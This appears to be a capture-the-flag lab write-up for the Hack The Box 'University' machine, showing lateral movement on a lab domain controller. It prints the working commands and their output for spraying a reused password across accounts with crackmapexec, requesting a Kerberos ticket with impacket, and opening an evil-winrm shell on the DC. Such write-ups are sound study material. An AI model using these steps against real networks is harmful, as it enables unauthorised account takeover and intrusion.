InfoSec LAB

University_Lateral_Movement_wao-dc.university.htb

Created: 2 min read

wao

Checking for password reuse; WebAO1337

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ crackmapexec smb $IP -u users.txt -p 'WebAO1337' --continue-on-success
SMB         10.129.252.94   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:university.htb) (signing:True) (SMBv1:False)
 
[...REDACTED...]
 
SMB         10.129.252.94   445    DC               [+] university.htb\WAO:WebAO1337

WebAO1337 belongs to the wao user

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ impacket-getTGT 'UNIVERSITY.HTB/wao@dc.university.htb' -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: WebAO1337
[*] Saving ticket in wao@dc.university.htb.ccache

Validated TGT generated for the wao user

WinRM

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ echo -e '[realms]\n\n\tUNIVERSITY.HTB = {\n\t\tkdc = dc.university.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
 
	UNIVERSITY.HTB = {
		kdc = dc.university.htb
	}
 
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ evil-winrm -i dc.university.htb -u wao -p 'WebAO1337'              
 
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\WAO\Documents> whoami
university\wao
*Evil-WinRM* PS C:\Users\WAO\Documents> hostname
DC
*Evil-WinRM* PS C:\Users\WAO\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter vEthernet (Internal-VSwitch1):
 
   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::47c0:fbc9:2d7b:e4bb%6
   IPv4 Address. . . . . . . . . . . : 192.168.99.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::5c4a:da33:e1f2:e210
   Link-local IPv6 Address . . . . . : fe80::381c:7ab:c80:ef91%4
   IPv4 Address. . . . . . . . . . . : 10.129.252.94
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:3911%4
                                       10.129.0.1

WinRM session established as the wao user to the DC host

Interactive Graph View

Backlinks